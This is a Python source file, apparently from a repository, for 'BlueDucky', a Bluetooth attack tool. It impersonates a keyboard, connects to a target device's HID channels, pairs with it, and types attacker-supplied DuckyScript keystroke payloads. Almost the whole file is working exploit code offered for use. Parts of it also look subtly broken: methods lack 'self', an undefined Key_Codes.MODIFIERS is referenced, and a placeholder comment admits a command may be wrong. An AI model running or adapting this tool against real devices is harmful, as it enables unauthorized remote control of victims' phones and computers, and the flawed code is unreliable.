BlueDucky-2/BlueDucky.py

441 lines
14 KiB
Python
Raw Normal View History

2024-01-17 01:21:00 +00:00
import binascii
2024-01-16 06:52:55 +00:00
import bluetooth
import logging as log
2024-01-17 01:21:00 +00:00
import sys
2024-01-16 06:52:55 +00:00
import time
2024-01-17 01:21:00 +00:00
from multiprocessing import Process
2024-01-16 06:52:55 +00:00
from pydbus import SystemBus
2024-01-17 01:21:00 +00:00
from enum import Enum
2024-01-16 06:52:55 +00:00
2024-01-17 01:21:00 +00:00
from utils.menu_functions import (main_menu, read_duckyscript,
run, restart_bluetooth_daemon, get_target_address)
from utils.register_device import register_hid_profile, agent_loop
2024-01-16 06:52:55 +00:00
2024-01-17 01:21:00 +00:00
child_processes = []
2024-01-16 06:52:55 +00:00
class ConnectionFailureException(Exception):
pass
class Adapter:
2024-01-17 01:21:00 +00:00
def __init__(self, iface):
self.iface = iface
self.bus = SystemBus()
self.adapter = self._get_adapter(iface)
2024-01-16 06:52:55 +00:00
2024-01-17 01:21:00 +00:00
def _get_adapter(self, iface):
try:
return self.bus.get("org.bluez", f"/org/bluez/{iface}")
except KeyError:
log.error(f"Unable to find adapter '{iface}', aborting.")
raise ConnectionFailureException("Adapter not found")
def _run_command(self, command):
result = run(command)
if result.returncode != 0:
raise ConnectionFailureException(f"Failed to execute command: {' '.join(command)}. Error: {result.stderr}")
def set_property(self, prop, value):
# Convert value to string if it's not
value_str = str(value) if not isinstance(value, str) else value
command = ["sudo", "hciconfig", self.iface, prop, value_str]
self._run_command(command)
# Verify if the property is set correctly
verify_command = ["hciconfig", self.iface, prop]
verification_result = run(verify_command)
if value_str not in verification_result.stdout:
log.error(f"Unable to set adapter {prop}, aborting. Output: {verification_result.stdout}")
raise ConnectionFailureException(f"Failed to set {prop}")
def power(self, powered):
self.adapter.Powered = powered
def reset(self):
self.power(False)
self.power(True)
def enable_ssp(self):
try:
# Command to enable SSP - the actual command might differ
# This is a placeholder command and should be replaced with the actual one.
ssp_command = ["sudo", "hciconfig", self.iface, "sspmode", "1"]
ssp_result = run(ssp_command)
if ssp_result.returncode != 0:
log.error(f"Failed to enable SSP: {ssp_result.stderr}")
raise ConnectionFailureException("Failed to enable SSP")
except Exception as e:
log.error(f"Error enabling SSP: {e}")
raise
2024-01-16 06:52:55 +00:00
2024-01-17 01:21:00 +00:00
class PairingAgent:
def __init__(self, iface, target_addr):
self.iface = iface
self.target_addr = target_addr
dev_name = "dev_%s" % target_addr.upper().replace(":", "_")
self.target_path = "/org/bluez/%s/%s" % (iface, dev_name)
2024-01-16 06:52:55 +00:00
2024-01-17 01:21:00 +00:00
def __enter__(self):
try:
log.debug("Starting agent process...")
self.agent = Process(target=agent_loop, args=(self.target_path,))
self.agent.start()
time.sleep(0.25)
log.debug("Agent process started.")
return self
except Exception as e:
log.error(f"Error starting agent process: {e}")
raise
def __exit__(self, exc_type, exc_val, exc_tb):
try:
log.debug("Terminating agent process...")
self.agent.kill()
time.sleep(0.25)
log.debug("Agent process terminated.")
except Exception as e:
log.error(f"Error terminating agent process: {e}")
raise
2024-01-16 06:52:55 +00:00
class L2CAPClient:
def __init__(self, addr, port):
self.addr = addr
self.port = port
self.connected = False
self.sock = None
2024-01-17 01:21:00 +00:00
def encode_combo_input(*args):
if not args:
return bytes([0xA1, 0x01] + [0] * 8) # Empty report for key release
# Filter out non-Key_Codes arguments and process
valid_args = [a for a in args if isinstance(a, Key_Codes)]
# Properly sum the values of modifiers
modifiers = sum(a.value for a in valid_args if a in Key_Codes.MODIFIERS)
keycodes = [a.value for a in valid_args if a not in Key_Codes.MODIFIERS]
2024-01-16 06:52:55 +00:00
keycodes += [0] * (6 - len(keycodes))
2024-01-17 01:21:00 +00:00
return bytes([0xA1, 0x01, modifiers, 0x00] + keycodes)
def encode_keyboard_input(*args):
keycodes = []
flags = 0
for a in args:
if isinstance(a, Key_Codes):
keycodes.append(a.value)
elif isinstance(a, Modifier_Codes):
flags |= a.value
assert(len(keycodes) <= 7)
keycodes += [0] * (7 - len(keycodes))
report = bytes([0xa1, 0x01, flags, 0x00] + keycodes)
return report
2024-01-16 06:52:55 +00:00
def close(self):
if self.connected:
self.sock.close()
self.connected = False
self.sock = None
def send(self, data):
2024-01-17 01:21:00 +00:00
if not self.connected:
log.error("[TX] Not connected")
return
2024-01-16 06:52:55 +00:00
log.debug(f"[TX-{self.port}] Attempting to send data: {binascii.hexlify(data).decode()}")
2024-01-17 01:21:00 +00:00
if self.attempt_send(data, 0.1):
log.debug(f"[TX-{self.port}] Data sent successfully")
else:
log.error(f"[TX-{self.port}] ERROR! Timed out sending data")
def attempt_send(self, data, timeout):
2024-01-16 06:52:55 +00:00
start = time.time()
2024-01-17 01:21:00 +00:00
while time.time() - start < timeout:
2024-01-16 06:52:55 +00:00
try:
self.sock.send(data)
2024-01-17 01:21:00 +00:00
return True
2024-01-16 06:52:55 +00:00
except bluetooth.btcommon.BluetoothError as ex:
if ex.errno != 11: # no data available
raise ex
time.sleep(0.001)
except Exception as ex:
log.error(f"[TX-{self.port}] Exception: {ex}")
self.connected = False
2024-01-17 01:21:00 +00:00
return False
2024-01-16 06:52:55 +00:00
def recv(self, timeout=0):
start = time.time()
while True:
raw = None
if not self.connected:
return None
if self.sock is None:
return None
try:
raw = self.sock.recv(64)
if len(raw) == 0:
self.connected = False
return None
log.debug(f"[RX-{self.port}] Received data: {binascii.hexlify(raw).decode()}")
except bluetooth.btcommon.BluetoothError as ex:
if ex.errno != 11: # no data available
raise ex
else:
if (time.time() - start) < timeout:
continue
return raw
def connect(self, timeout=None):
log.debug(f"Attempting to connect to {self.addr} on port {self.port}")
log.debug("connecting to %s on port %d" % (self.addr, self.port))
sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
sock.settimeout(timeout)
try:
sock.connect((self.addr, self.port))
sock.setblocking(0)
self.sock = sock
self.connected = True
log.debug("SUCCESS! connected on port %d" % self.port)
except Exception as ex:
self.connected = False
log.error("ERROR connecting on port %d: %s" % (self.port, ex))
raise ConnectionFailureException(f"Connection failure on port {self.port}")
return self.connected
def send_keyboard_report(self, *args):
self.send(self.encode_keyboard_input(*args))
def send_keypress(self, *args, delay=0.05):
2024-01-17 01:21:00 +00:00
if args:
log.debug(f"Attempting to send... {args}")
self.send(self.encode_keyboard_input(*args))
else:
# If no arguments, send an empty report to release keys
self.send(self.encode_keyboard_input())
time.sleep(delay)
def send_combination(self, *keys, delay=0.05):
"""
Send a combination of keys, which can include modifiers and regular keys.
"""
modifiers = 0
regular_keys = []
for key in keys:
if key in Key_Codes.MODIFIERS:
modifiers |= key.value
else:
regular_keys.append(key.value)
# Ensure that no more than 6 regular keys are sent
regular_keys = regular_keys[:6] + [0] * (6 - len(regular_keys))
# Create the HID report and send it
report = bytes([0xa1, 0x01, modifiers, 0x00] + regular_keys)
self.send(report)
time.sleep(delay)
# Send an empty report to release the keys
self.send(self.encode_combo_input())
2024-01-16 06:52:55 +00:00
class L2CAPConnectionManager:
def __init__(self, target_address):
self.target_address = target_address
self.clients = {}
def create_connection(self, port):
client = L2CAPClient(self.target_address, port)
self.clients[port] = client
return client
def connect_all(self):
2024-01-17 01:21:00 +00:00
try:
return sum(client.connect() for client in self.clients.values())
except ConnectionFailureException as e:
log.error(f"Connection failure: {e}")
raise
2024-01-16 06:52:55 +00:00
def close_all(self):
for client in self.clients.values():
client.close()
def terminate_child_processes():
for proc in child_processes:
if proc.is_alive():
proc.terminate()
proc.join()
2024-01-17 01:21:00 +00:00
def setup_bluetooth(target_address):
restart_bluetooth_daemon()
profile_proc = Process(target=register_hid_profile, args=('hci0', target_address))
profile_proc.start()
child_processes.append(profile_proc)
adapter = Adapter('hci0')
adapter.set_property("name", "Robot POC")
adapter.set_property("class", 0x002540)
adapter.power(True)
return adapter
# Key codes for modifier keys
class Modifier_Codes(Enum):
LEFTCONTROL = 0xe0
LEFTSHIFT = 0xe1
LEFTALT = 0xe2
LEFTGUI = 0xe3
RIGHTCONTROL = 0xe4
RIGHTSHIFT = 0xe5
RIGHTALT = 0xe6
RIGHTGUI = 0xe7
# Convenience mappings for common names
CTRL = LEFTCONTROL
ALT = LEFTALT
SHIFT = LEFTSHIFT
GUI = LEFTGUI
# Modifier Key Set for easy checking
MODIFIER_KEYS_SET = {Modifier_Codes.LEFTCONTROL, Modifier_Codes.LEFTSHIFT, Modifier_Codes.LEFTALT, Modifier_Codes.LEFTGUI,
Modifier_Codes.RIGHTCONTROL, Modifier_Codes.RIGHTSHIFT, Modifier_Codes.RIGHTALT, Modifier_Codes.RIGHTGUI}
class Key_Codes(Enum):
NONE = 0x00
A = 0x04
B = 0x05
C = 0x06
D = 0x07
E = 0x08
F = 0x09
G = 0x0a
H = 0x0b
I = 0x0c
J = 0x0d
K = 0x0e
L = 0x0f
M = 0x10
N = 0x11
O = 0x12
P = 0x13
Q = 0x14
R = 0x15
S = 0x16
T = 0x17
U = 0x18
V = 0x19
W = 0x1a
X = 0x1b
Y = 0x1c
Z = 0x1d
_1 = 0x1e
_2 = 0x1f
_3 = 0x20
_4 = 0x21
_5 = 0x22
_6 = 0x23
_7 = 0x24
_8 = 0x25
_9 = 0x26
_0 = 0x27
ENTER = 0x28
ESCAPE = 0x29
BACKSPACE = 0x2a
TAB = 0x2b
SPACE = 0x2c
MINUS = 0x2d
EQUAL = 0x2e
LEFTBRACE = 0x2f
RIGHTBRACE = 0x30
BACKSLASH = 0x31
SEMICOLON = 0x33
QUOTE = 0x34
BACKTICK = 0x35
COMMA = 0x36
DOT = 0x37
SLASH = 0x38
CAPSLOCK = 0x39
def process_duckyscript(client, duckyscript):
client.send_keypress('') # Send empty report
time.sleep(0.5)
for line in duckyscript:
line = line.strip()
if not line or line.startswith("REM"):
continue # Skip empty lines and comments
if line.startswith("STRING"):
text = line[7:]
for letter in text:
try:
# Use upper() to match the uppercase keys defined in Key_Codes
key_code = getattr(Key_Codes, letter.upper()) if letter != " " else Key_Codes.SPACE
client.send_keypress(key_code)
client.send_keypress()
time.sleep(0.05) # Add a small delay between keypresses
except AttributeError:
log.warning(f"Unsupported character '{letter}' in Duckyscript")
elif line.startswith("GUI"):
# Handle combination keys
components = line.split()
try:
# Use Modifier_Codes for modifier keys
modifier = getattr(Modifier_Codes, components[0].upper())
for key in components[1:]:
# Use Key_Codes for regular keys
key_code = getattr(Key_Codes, key.upper(), None)
if key_code:
client.send_combination(modifier, key_code)
client.send_combination() # Release keys
except AttributeError:
log.warning(f"Unsupported key or modifier in line: {line}")
def initialize_pairing(agent_iface, target_address):
try:
with PairingAgent(agent_iface, target_address) as agent:
log.debug("Pairing agent initialized")
except Exception as e:
log.error(f"Failed to initialize pairing agent: {e}")
raise ConnectionFailureException("Pairing agent initialization failed")
def establish_connections(connection_manager):
if not connection_manager.connect_all():
raise ConnectionFailureException("Failed to connect to all required ports")
2024-01-16 06:52:55 +00:00
# Main function
def main():
log.basicConfig(level=log.DEBUG)
main_menu()
2024-01-17 01:21:00 +00:00
target_address = get_target_address()
if not target_address:
log.info("No target address provided. Exiting.")
2024-01-16 06:52:55 +00:00
return
duckyscript = read_duckyscript()
if not duckyscript:
log.info("Payload file not found. Exiting.")
return
2024-01-17 01:21:00 +00:00
adapter = setup_bluetooth(target_address)
2024-01-16 06:52:55 +00:00
adapter.enable_ssp()
try:
connection_manager = L2CAPConnectionManager(target_address)
2024-01-17 01:21:00 +00:00
connection_manager.create_connection(1) # SDP
connection_manager.create_connection(17) # HID Control
connection_manager.create_connection(19) # HID Interrupt
initialize_pairing('hci0', target_address)
establish_connections(connection_manager)
hid_interrupt_client = connection_manager.clients[19]
process_duckyscript(hid_interrupt_client, duckyscript)
2024-01-16 06:52:55 +00:00
except ConnectionFailureException as e:
log.error(f"Connection failure: {e}")
terminate_child_processes()
sys.exit("Exiting script due to connection failure")
if __name__ == "__main__":
try:
main()
finally:
terminate_child_processes()